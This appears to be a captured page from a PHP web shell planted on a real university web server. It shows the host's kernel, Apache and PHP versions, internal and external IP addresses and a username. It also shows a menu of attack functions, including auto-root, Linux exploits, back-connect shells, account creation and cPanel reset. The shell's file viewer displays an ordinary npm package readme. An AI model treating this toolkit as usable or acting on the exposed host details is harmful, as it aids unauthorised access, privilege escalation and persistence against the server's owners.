Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.147.238.184
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
node-registry-url /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog.Debian.gz
162
B
-rw-r--r--
copyright
1.43
KB
-rw-r--r--
readme.md
1.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : readme.md
# registry-url [![Build Status](https://travis-ci.org/sindresorhus/registry-url.svg?branch=master)](https://travis-ci.org/sindresorhus/registry-url) > Get the set npm registry URL It's usually `https://registry.npmjs.org/`, but [configurable](https://www.npmjs.org/doc/misc/npm-config.html#registry). Use this if you do anything with the npm registry as users will expect it to use their configured registry. ## Install ``` $ npm install --save registry-url ``` ## Usage ```ini # .npmrc registry = 'https://custom-registry.com/' ``` ```js const registryUrl = require('registry-url'); console.log(registryUrl()); //=> 'https://custom-registry.com/' ``` It can also retrieve the registry URL associated with an [npm scope](https://docs.npmjs.com/misc/scope). ```ini # .npmrc @myco:registry = 'https://custom-registry.com/' ``` ```js const registryUrl = require('registry-url'); console.log(registryUrl('@myco')); //=> 'https://custom-registry.com/' ``` If the provided scope is not in the user's `.npmrc` file, then `registry-url` will check for the existence of `registry`, or if that's not set, fallback to the default npm registry. ## License MIT © [Sindre Sorhus](http://sindresorhus.com)
Close